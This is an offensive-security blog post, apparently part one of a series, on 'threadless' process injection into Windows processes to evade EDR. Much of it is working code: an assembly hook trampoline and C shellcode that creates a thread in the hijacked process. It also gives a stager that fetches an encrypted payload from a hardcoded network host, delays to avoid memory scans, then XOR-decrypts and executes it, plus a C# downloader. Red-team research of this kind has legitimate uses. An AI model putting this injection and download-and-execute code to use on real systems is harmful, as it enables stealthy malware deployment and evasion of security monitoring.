Offensive

Threadless Ops - Enhanced Shellcoding for Threadless Injections

Process Injection is essential in red teaming and serves various strategic objectives, enabling attackers to expand their capabilities.


Process Injection is essential in red teaming and serves various strategic objectives, enabling attackers to expand their capabilities:

  • Privilege Escalation: Other processes may possess privileged rights, like browsers storing cookies or passwords, which an attacker can leverage.
  • Bypassing Restrictions: Security mechanisms such as EDRs (Endpoint Detection and Response) or other protective measures can often be bypassed, e.g., processes exempt from EDRs or allowed by Windows Firewall.
  • Improved Stability: An attacker can ensure execution by launching redundant code instances across multiple processes, enhancing persistence. Even if a process is terminated by the user, the attacker isn't entirely removed from the system.
  • Stealth: Attackers remain hidden within the target process, lowering the likelihood of detection. Actions like interacting with Kerberos appear less suspicious when executed from a browser process.

This topic has evolved from a simple malware technique into an essential red team tactic. As defensive products evolve, attackers and red teams continually innovate to develop stealthier injection methods.

The classic foundation of Process Injection leverages the Windows API and involves these three primary steps:

  • Memory allocation: Reserve space in the target process (e.g., using VirtualAllocEx).
  • Writing memory: Write payload (e.g., C2 agent) to allocated memory (e.g., using WriteProcessMemory).
  • Execution: Start a thread in the infected process to execute the payload (e.g., using CreateRemoteThread).

This traditional sequence of operations is closely monitored by modern EDR solutions. The combined use of these APIs will likely trigger an alert or even terminate the relevant processes automatically.

Other Process Injection methods can be found at MITRE ATT&CK - T1055 Process Injection. Interestingly, the Threadless Injection method is yet to be explicitly listed.

In this blog post, we dive deeper into Threadless Injection as an advanced form of process injection, analyze current methods and examples, and develop an improved strategy using custom shellcode. The finished results are available on GitHub as ThreadlessOps.

Explanation and Advantages of Threadless Injection

Threadless Injection is a modern process injection method, which eliminates the need for explicitly creating a dedicated execution thread, thereby reducing the number of steps from the three outlined above to just two. In contrast to the classic thread injection, the execution takes place naturally within an already-existing thread context of the target process. This makes detection much more difficult and typically requires manual thread hunting techniques (Advanced Thread Hunting in EDR products). Detection examples for such attacks can be found in this blog from Elastic Security Labs.

Threadless via Remote Function Hooking

One possibility for executing the injected code from within the target process itself is remote function hooking. Ceri Coburn demonstrates this in a clear and detailed way in his project Threadless Process Injection using remote function hooking and the associated presentation. Using this approach, functions which are called regularly during normal execution and that have already been loaded within the target process are overwritten with attacker-controlled code. After a short period of time, the target process naturally executes the payload.

Remote Function Hooking

The function targeted for overwriting (for example, NtWaitForSingleObject from NTDLL.dll) can be freely chosen. As a result, this technique becomes universally applicable to all processes that load the affected library. This effectively means that almost every process can be targeted. Therefore, this method is my preferred approach.

The project by Ceri Coburn also serves as the starting point for many other projects regarding Threadless Injection. However, the project itself primarily focuses on demonstrating the technique. Although example shellcode to launch a calculator program (calc.exe) is provided, the project lacks a functioning chaining mechanism and extensible shellcode integration, which are necessary for the reliable execution of custom payloads.

Threadless via Entry Point Injection

EPI (Entry Point Injection) is a project utilizing another variant of Threadless Injection, based on overwriting the entry points (DllMain) of DLL modules already loaded into the target process. These entry points are executed whenever a thread used by the target process is created or terminated.

From my perspective, this method constitutes an alternative approach, yet it has the significant disadvantage that not every process frequently creates or terminates threads. A practical advantage of this project is that complex shellcode has already been implemented to achieve functional payload execution with the Threadless technique. The payload shellcode itself has been generated using the sRDI project by monoxgas, which converts existing DLL files into executable memory shellcode. While this adds significant overhead, the development of standard DLLs remains easier compared to other shellcoding methods.

Is it really Threadless?

From my perspective, the implication of performing an injection without a thread is only partially true. While the initial execution during the injection indeed requires no new thread, it nonetheless runs in the context of an existing thread, thereby interrupting its regular operations.

Consider the scenario where we want to run a fully functional, stable C2-agent in the target process. Usually, we would require parallel execution via a dedicated new thread. However, we can better obfuscate the connection between the injection and the creation of this new thread by leveraging this technique, as the thread creation will be performed naturally by the target process itself.

If we only wish to perform a short or temporary task, we can completely omit creating a new thread. Such short tasks might include briefly executing a Windows command or modifying a Windows configuration. Because we temporarily hijack the original Control Flow, we must return control back to the target process as quickly as possible. Failure to do so may cause the target process to freeze or even crash. To avoid this issue, we need specially crafted shellcode that can inject the payload (such as a C2-agent) into a newly created thread within the target process and then cleanly restore the previously stolen control flow.

Is Threadless enough?

Threadless Injection is an effective evasion technique, but it is certainly not a universal solution. With this method, only a foothold in the target system can be obtained.

To ensure that you remain undetected afterwards, Yoann Dequeker combined this method with Module Stomping. He explained this technique at several events, including the Swiss Cybersecurity Conference 2024 - Uncommon Process Injection Pattern – Yoann Dequeker.

The underlying problem is that after injection, our shellcode, and thus our payload, is executed from newly allocated memory regions. This memory region is not derived from the original application or its modules, which can typically be found on disk. This distinction is referred to as Unbacked Memory, a feature easily visible with any debugger:

Unbacked Memory Example

  1. Here, you see the memory type IMG, which stands for Image and corresponds to Backed Memory. PRV stands for Private, corresponding to Unbacked Memory.
  2. Both highlighted memory regions under "Protection" have the execution flag (E) set and are located explicitly in Unbacked Memory.

Finding executable Unbacked Memory, as in this example, typically indicates injected malicious code. There are exceptions, e.g. the Just-In-Time (JIT) compilation process used by .NET processes creates executable Unbacked Memory as well. Nevertheless, this IOC (Indicator of Compromise) can be completely avoided by using Module Stomping. However, with Module Stomping, you're effectively substituting one IOC for another. In this particular case, we have to load another DLL inside the running process and then overwrite its allocated Backed Memory with our malicious code.

Another very effective evasion method is demonstrated by Fabian Mosch (S3cur3Th1sSh1t) in his project Caro-Kann. With this method, the payload, often including a known C2 agent which can be easily detected in memory, is delivered in an encrypted form. A small shellcode (stager) waits a few seconds before decrypting and executing the payload. Since we must always assume the existence of some IOCs, we expect EDR solutions to inspect the memory block where we create a new thread. Because our payload remains encrypted during the first few seconds after loading, the EDR should not detect known malicious patterns inside the memory.

My favorite project concerning Threadless Injection is ThreadlessStompingKann and the corresponding blog post by Caue Borella. This project combines three methods: Threadless Injection, Module Stomping and Caro-Kann to launch a C2 agent from the Havoc C2 framework.

However, this approach has the following disadvantages:

  • LoadLibrary is executed from Unbacked Memory for loading the DLL.
  • Threadless Injection is carried out multiple times.
  • Many calls to VirtualAlloc and VirtualProtect are executed on the target process.
  • Overall, large amounts of data are written into the memory of the target process.

Due to the invasive alteration of the target process memory and somewhat messy handling of loaded modules, this approach has a higher likelihood of detection. Additionally, the Caro-Kann project specifically expects to start from a dedicated new thread, which is not properly implemented in ThreadlessStompingKann. If the payload does not return its control flow, which is common for some C2 agents, the target process might freeze. In ThreadlessStompingKann, this scenario works because the Havoc payload itself independently creates a new thread shortly after execution.

New Deal

In principle, we can reuse and build upon a lot of existing resources. For example, I find that the shellcode from Caro-Kann provides a solid starting point to develop enhanced and customized shellcode. This particular shellcode appears to be based on the project C-To-Shellcode-Examples, which itself originates from the example PIC-Get-Privileges from the Blog by Chetan Nayak (ParanoidNinja) (the developer of the Brute Ratel C2 framework). Thus, optimized shellcode can be created, containing very little overhead in the generated machine code.

By setting up our own thread creation, we achieve better compatibility with various payloads. This approach eliminates the need for the payload itself to create new threads or repeatedly perform evasion techniques. This process can be further optimized through techniques like Caro-Kann or Module Stomping. If you examine the entire scenario closely, the term “threadless” becomes much less fitting. However, given that the thread creation responsibility was delegated to the Havoc payload in the ThreadlessStompingKann project, I do not see any particular disadvantage.

To optimize the Module Stomping method, we must hide the required call to the LoadLibrary Windows API. We must consider that such calls might be detected by EDR solutions via user-mode hooking or telemetry data (ETWTI). This is currently a limitation in all previously mentioned projects. Evading this detection technique reliably may seem challenging, but Chetan Nayak (ParanoidNinja) presented a viable solution in his blog Dark Vortex, illustrating how he implemented this evasion technique in his own C2 framework. He explains clearly how ETWTI stack tracing works and how to evade it through callback evasion. Additionally, Shayan Muhammad introduced another Windows API which is useful for callback evasion in his Medium article.

Furthermore, I consider minimizing interactions with the target process beneficial. Thus, I will implement an option to download and load the payload from within the context of the target process itself, rather than passing it at injection time. The shellcode can then copy itself into a newly loaded Backed Memory region. The overall layout of this new plan now looks like this:

Shellcode Injection Overwiev

  1. We inject our shellcode into the target process (e.g., ms-teams.exe).
  2. We overwrite a selected function (e.g., NtWaitForSingleObject from NTDLL.dll) within that process, so that when it gets called, our shellcode is executed.
  3. We wait until the injected process naturally calls the overwritten function.
  4. The overwritten function gets executed, triggering our shellcode.
  5. Initially, we reside inside Unbacked Memory and use callback evasion techniques to stealthily load another module (e.g., chakra.dll).
  6. The shellcode copies itself into the newly loaded legitimate Backed Memory area.
  7. We overwrite the original function once again to execute the copied shellcode residing in the legitimate Backed Memory region.
  8. After returning from our hooking function, an immediate call is made to our copied shellcode.
  9. A new thread is created and will now execute independently.
  10. We restore the originally overwritten function back to its initial state and return control flow.
  11. The original function resumes its normal execution.

Now our thread runs independently. It initially waits a few seconds to mitigate in-memory scans and detection strategies. Optionally, the payload can then be downloaded if it is not already included within the shellcode, after which it will be decrypted and executed.

Shellcode Development (Part 1 of 2)

After covering the theory, it is time to get into the practical details. To avoid overwhelming you with a single blog post, I have decided to split this topic into two parts. In this first part, we focus on the later stage of our attack chain, which is visible on the right-hand side of the overview illustration. This includes the required shellcode steps to:

  • create a new thread,
  • load a payload from the network,
  • decrypt and execute the payload.

Towards this end, I slightly adjusted the method from Caro-Kann and fixed an existing issue in the decryption function. Building on this, we will implement callback evasion, Module Stomping, and shellcode replication in the second part of this series.

All the necessary resources and code samples are available in my GitHub project ThreadlessOps.

Compiling, Executing and Testing

As the operating system, I recommend using Kali Linux, since it already includes the required build and compilation tools. Visual Studio Code can optionally be installed for easier development. To compile the project, both GCC and NASM are required. If development is not carried out on Linux, some adjustments in the project will need to be made.

For initial testing, we will use a simple example. In the project file Shellcode/Shellcode.c, we write the following source code:

            
                   

#include "APIResolve.h"

void Main()

{

    char message[] = { 'H', 'e', 'l', 'l', 'o', ' ', 'W', 'o', 'r', 'l', 'd', '!', 0x00 };

    uint64_t _MessageBoxA = getFunctionPtr(HASH_USER32, HASH_MESSAGEBOXA);

    ((MESSAGEBOXA)_MessageBoxA)(0, message, message, 1);

}

Strings within shellcode cannot be declared in the usual way. Since we require Position-Independent-Shellcode (PIC), we must avoid heap allocations. This ensures our code can run at any arbitrary location in memory. Therefore, strings must instead be declared as individual char arrays on the stack. Similarly, we cannot include direct module or API calls, so we rely on the included getFunctionPtr() function. This function locates the desired Windows API functions in the current process memory and returns a pointer to their memory addresses. This function, along with the type definitions for the Windows API, is provided and loaded through the included APIResolve.h header file.

To create the shellcode, run the provided script within the project's root folder.

Build Shellcode

The result is a compact binary file of size 432 bytes. Using the command ndisasm -b 64 Shellcode.bin, you can disassemble this binary file into readable assembly code format. The shellcode is now highly optimized specifically for its intended execution.

This shellcode is essentially universal and can now be used in any shellcode loader you prefer. If you would like to test it with Threadless Injection, two options are available:

On a system with disabled Antivirus/EDR, you can directly use the original project: Threadless Process Injection using remote function hooking. This was also my preferred method. I added the following enhancement in C# to allow downloading my compiled shellcode directly across the network:

            
                   

// Added function

static byte[] DownloadShellcode(string u)

{

    System.Net.WebClient client = new WebClient();

    try

    {

        byte[] data = client.DownloadData(u);

        return data;

    }

    catch (Exception ex) { return new byte[] { }; }

}

// Changed function

private static byte[] LoadShellcode(string path)

{

    byte[] pl = DownloadShellcode("http://192.168.247.131:80/Shellcode.bin");

    return pl;

}

Additionally, there is a potential problem in the original injection project. After executing our shellcode, the injector will release its allocated memory back to the target process. If the shellcode is still running at this point, e.g. displaying a MessageBox, this will cause an application crash (AccessViolationException). To prevent this, remove the corresponding calls to FreeVirtualMemory and ProtectVirtualMemory, as shown here:

Bugfix Threadless Injector

If you would rather test this with active Antivirus/EDR, you need an existing Evasion technique such as the one provided by the Sliver C2 Framework, which already contains a Threadless Inject Beacon Object File (BOF). With this, you can run and test your new Threadless Injection shellcode directly from your Kali Linux machine. In my case, I used my own undetected PowerShell-based loader for testing:

Test Threadless Sliver

Whenever NtWaitForSingleObject is eventually called by the target process (notepad.exe in this example), our shellcode is executed. In this case, this particular Windows API is used by the process when it opens a new dialog window, for instance via the menu item Help -> Info.

Result Threadless Test

Instead of NtWaitForSingleObject, different target functions can be selected. Some are suitable options, and some less so. In his YouTube video, Fabian Mosch (S3cur3Th1sSh1t) explains how to find the right function for a particular use case.

Debugging

During development, errors can occur. My preferred tool for analyzing such scenarios is x64dbg. An important aspect in Threadless Injection with function hooking is the temporary redirection of the control flow in a manner that is unintended by the original function. As a result, we violate the standard x86 calling conventions. Normally, the called function is responsible for restoring non-volatile registers (such as RBX, RSP, R12, etc.). However, in our scenario, volatile registers must also be restored; otherwise, the original function cannot continue execution correctly after executing our injected shellcode.

To address this, the original project by Ceri Coburn implemented a ShellcodeLoader - a trampoline that is combined with the injected shellcode. Additionally, it is responsible for restoring the overwritten function's original bytes after shellcode execution:

            
                   

start:

    pop     rax                             ; Save return address in RAX

    sub     rax, 0x5                        ; Adjust return address backwards

    push    rax                             ; Save registers on the stack

    push    rcx

    push    rdx

    push    r8

    push    r9

    push    r10

    push    r11

    movabs  rcx, 0x1122334455667788         ; Restore original bytes at the return address (unhook code)

    mov     QWORD PTR [rax], rcx            

    sub     rsp, 0x40                       ; Make stack space for shellcode

    call    shellcode                       ; Execute shellcode

    add     rsp, 0x40                       ; Restore stack and registers

    pop     r11

    pop     r10

    pop     r9

    pop     r8

    pop     rdx

    pop     rcx

    pop     rax

    jmp     rax                             ; Jump back to return address

shellcode:

First, the return address is popped from the stack and corrected by subtracting 5 bytes, so that it points to the instruction before our call. This enables the restored original code to be seamlessly executed at the same location afterwards. To restore the original code, a placeholder (0x1122334455667788) is saved and replaced by the original bytes during the injection. Additionally, registers are saved on the stack (push) and later restored (pop) after running our shellcode (call shellcode). Finally, execution is returned with a jump (jmp rax).

We can verify this behavior by setting a hardware breakpoint at the overwritten function inside the debugger. We should observe two distinct breakpoint hits:

  • The first breakpoint indicates the execution of the injected code that points to our combined shellcode.
  • The second breakpoint occurs after the function restoration, showing its original code being correctly executed.

At both points, we have the opportunity to examine registers and the stack in detail. The highest stability is ensured when all registers and stack content remain fully unchanged. In my example, the target function is NtWaitForMultipleObjects from NTDLL.dll.

Execution after function overwrite (Hooked):

Debugger Function Hooked

Execution after function restoration:

Debugger Function Restored

At point (1) in the screenshots, we clearly observe the injected call pointing initially to our shellcode and afterwards being restored back to its original bytes. At points (2) and (3), we examine registers and the stack before and after shellcode execution. Note that the RAX register is altered. This register was used by the trampoline at the end of execution (pop rax, jmp rax) to resume normal function flow. Since RAX was not further utilized by the original function, this alteration does not cause any errors.

It is crucial to highlight that some publicly available shellcodes found online do not reliably restore stack state and registers. These shellcodes are not suitable for this use case, since they will inevitably lead to crashes.

Creating a New Thread

We now restore our test shellcode in Shellcode/Shellcode.c back to the current project's state on ThreadlessOps. This code includes different steps relevant to the first segment of this blog post. In the Main function, you can find the code necessary to start a new thread:

            
                   

    // Define CreateThread function

    uint64_t _CreateThread = getFunctionPtr(HASH_KERNEL32, HASH_CREATETHREAD);

    CREATE_THREAD pCreateThread = (CREATE_THREAD)_CreateThread;

    // Variables for thread creation

    DWORD threadId;

    // Create thread pointing to the function Thread(NULL)

    pCreateThread(

        NULL,                  // Default security attributes

        0,                     // Default stack size

        Thread,                // Function to execute in thread

        NULL,                  // Parameter to thread-specific function

        0,                     // Run immediately

        &threadId              // Thread ID

    );

Since our shellcode has been called by an overwritten Windows API, we currently operate within the stolen Control Flow of the target process. This requires us to return control to the original process as quickly as possible. To achieve this, we immediately create a new thread that points to the Thread function. For this task, we invoke the Windows API function CreateThread from Kernel32.dll. Following thread creation, we return execution to the shellcode entry point alignstack.asm, which then returns to the ShellcodeLoader trampoline. This trampoline ensures the stable continuation of the hijacked process.

At this point, we have successfully created a new thread in the process, allowing us to run independently from the target process's normal execution flow and correctly restore the stolen Control Flow.

Payload Download

We can now download the desired payload from a remote host in the new thread. For this purpose, we utilize functions such as HttpOpenRequestA from wininet.h. To use standard APIs, we must load the Microsoft module wininet.dll. This loading is automatically handled by the provided getFunctionPtr function. If a requested module is not yet loaded, getFunctionPtr transparently loads it via a call to LoadLibrary. However, parameter definitions for the download URL, port, and filename are placed outside of the DownloadDecryptExecutePayload function:

            
                   

// Parameter in memory to provide the HTTP hostname for the payload

void PayloadHostname()

{

    asm(".byte '1', '9', '2', '.', '1', '6', '8','.', '2', '4', '7', '.', '1', '3', '1', 0x00");

}

// Parameter in memory to provide the HTTP port for the payload

void PayloadPort()

{

    asm(".long 80");

}

// Parameter in memory to provide the HTTP filename of the payload

void PayloadFilename()

{

    asm(".byte 'E', 'n', 'c', 'r', 'y', 'p', 't', 'e', 'd', 'P', 'a', 'y', 'l', 'o', 'a', 'd', '.', 'b', 'i', 'n', 0x00");

}

The advantage of this approach lies in the generated machine code. These bytes are easy to locate in the compiled shellcode, allowing us to adjust the resource location directly, e.g. dynamically modifying the IP address at injection time. Since these are Null-terminated strings, the last byte must be a NUL character (0x00). Immediately following the terminated string, the byte 0xC3 (RET instruction) marks the function return. Nevertheless, we merely use these functions as memory pointers to the specified variables. The referenced data is easily observable with a hex editor:

Shellcode Download Address

Because Module Stomping has not been implemented yet at this stage, we still load the payload into a newly allocated memory region. Since this region is created with VirtualAlloc, our payload currently resides in Unbacked Memory. We will address and correct this particular issue later, in part two, via Module Stomping.

            
                   

void DownloadDecryptExecutePayload() {

 

...

    char* hostname = (char*) &PayloadHostname;

    LPCTSTR endpoint = (LPCTSTR) &PayloadFilename;

    uint32_t port = *( (uint32_t*)PayloadPort);

 

HINTERNET h_session = NULL, h_connect = NULL, h_request = NULL;

DWORD dw_read = 0, dw_read_total = 0, dw_success = 0;

char method[] = { 'G', 'E', 'T', 0x00 };

 

SIZE_T mem_size = 1024*1024;  // Max Size of Payload!! 1MB

    LPVOID ptr_memory = ((VIRTUALALLOC)_VirtualAlloc)(0, mem_size, MEM_COMMIT, PAGE_READWRITE);

...

 

}

Here, we see the assignment of previously defined parameters (PayloadHostname, PayloadFilename, PayloadPort) and the initialization of the new memory region for storing the payload (ptr_memory). An important limiting factor when downloading is mem_size. Because of this, payloads may not exceed 1 MB.

Payload Decryption and Execution

For payload decryption, we're using the decryption function from the project Caro-Kann created by Fabian Mosch (S3cur3Th1sSh1t). In this implementation, Andrei Herasimau corrected a bug in the second loop at buf8[i] ^= (uint8_t)(xorKey & 0xFF);. Previously, this flaw resulted in the last bytes being incorrectly decrypted in 50% of the payloads.

            
                   

void PayloadDecryptionKey()

{

    asm(".byte 0x01, 0x02, 0x03, 0x04");

}

// Function to decrypt the payload with a key

void xor32(LPVOID buf, DWORD bufSize)

{

    uint32_t* buf32 = (uint32_t*)buf;

    // xorKey is the value of LongKey() function, which is a char array. We need to convert it to uint32_t

    uint32_t xorKey = *(uint32_t*)PayloadDecryptionKey;

    uint8_t* buf8 = (uint8_t*)buf;

    size_t bufSizeRounded = (bufSize - (bufSize % sizeof(uint32_t))) / sizeof(uint32_t);

    for (size_t i = 0; i < bufSizeRounded; i++)

    {

        ((uint32_t*)buf8)[i] ^= xorKey;

    }

    for (size_t i = sizeof(uint32_t) * bufSizeRounded; i < bufSize; i++)

    {

        size_t x = i % (sizeof(uint32_t) * bufSizeRounded); // calculate offset

        buf8[i] ^= (uint8_t)((xorKey >> (8 * x)) & 0xFF); // shift and xor bytes

    }

}

This function iterates byte-by-byte through the payload and applies an XOR operation using a predefined key. This key must exactly match the encryption key defined in the payload encryptor Encrypt_Payload.py:

            
                   

def long_key():

    key_string = "01020304" # Payload Encryption Key

    return bytes.fromhex(key_string)

To successfully execute the entire process, several additional steps are required. First, we wait a few seconds using the Sleep function to evade in-memory scanning from EDR/AV solutions. We must also adjust the protections on our allocated memory space: setting it initially to RWX for decryption, and then finally adjusting it to RX during payload execution. We specifically choose RWX initially in case the payload shares the same memory region as the shellcode.

            
                   

void DecryptExecutePayload(LPVOID payload, DWORD len) {

    uint64_t _Sleep = getFunctionPtr(HASH_KERNEL32, HASH_SLEEP);

    // Wait 2 seconds before changing protection

    ((SLEEP)_Sleep)(2000);

    // Update protection of payload to PAGE_READWRITE

    DWORD oldProtect;

    uint64_t _VirtualProtect = getFunctionPtr(HASH_KERNEL32, HASH_VIRTUALPROTECT);

    ((VIRTUALPROTECT)_VirtualProtect)(payload, len, PAGE_EXECUTE_READWRITE, &oldProtect);

    // Wait 3 seconds before decrypting and execution of payload

    ((SLEEP)_Sleep)(3000);

    // Decrypt payload

    xor32(payload, len);

    // Update protection of payload to EXECUTE_READ

    ((VIRTUALPROTECT)_VirtualProtect)(payload, len, PAGE_EXECUTE_READ, &oldProtect);

    // Execute payload

    ((void (*)())payload)();

}

In the end, we execute our payload. This line of code casts our payload to a function pointer and calls the function in this manner. We notably omit a direct trampoline-based jump, which was utilized by the original Caro-Kann project. Given that we will have properly backed memory and our call stack should remain clean, I see no clear advantage in retaining the trampoline jump.

Conclusion

Through this research, I was able to dive deeply into the topic of process injection techniques. It became clear that there still exist viable options for attackers today. The available techniques are sophisticated and apparently remain undetected by common EDR/AV products. However, effective defense strategies are already emerging, such as the approaches presented in the previously mentioned blog article by Elastic Security Labs, which Blue Teams can utilize.

Nevertheless, it remains challenging in practice, especially in modern software environments that utilize technologies such as JIT compilation, commonly found with .NET processes, to generate reliable IOCs to detect our attack. Even so, successful implementation of these advanced offensive techniques today requires a high degree of expertise and practical experience.

Similar posts